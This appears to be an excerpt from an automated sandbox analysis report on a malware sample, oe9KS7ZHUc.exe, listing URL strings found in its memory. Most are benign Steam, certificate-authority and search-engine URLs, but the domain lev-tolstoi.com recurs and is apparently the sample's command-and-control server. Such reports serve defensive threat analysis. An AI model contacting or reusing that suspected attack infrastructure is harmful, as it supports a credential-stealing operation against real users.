              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1833183024.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1833183024.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1833183024.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1833183024.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1833183024.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1833183024.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1833183024.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1833183024.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1833183024.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1833183024.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1833183024.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1783584612.0000000005CED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1859053217.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1859053217.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1783584612.0000000005CED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1782732973.0000000001478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1783584612.0000000005CED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1783584612.0000000005CED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1782732973.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737835610.000000000143C000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737835610.000000000143C000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737835610.000000000143C000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737835610.000000000143C000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737835610.000000000143C000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1859053217.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1859053217.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1783584612.0000000005CED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1783584612.0000000005CED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1783584612.0000000005CED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1859053217.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1782732973.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1977872773.00000000014B1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000002.1979555678.0000000001442000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1895777813.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1863286746.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1977740044.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1859053217.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
              Source: oe9KS7ZHUc.exe, 00000000.00000002.1979790273.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1977740044.00000000014EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/E
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1896190150.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1913981579.00000000014EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/E=
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1913636006.0000000005CA2000.00000004.00000800.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1899540875.0000000005CA2000.00000004.00000800.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1973428935.0000000005CB1000.00000004.00000800.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1895777813.0000000005CAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/H
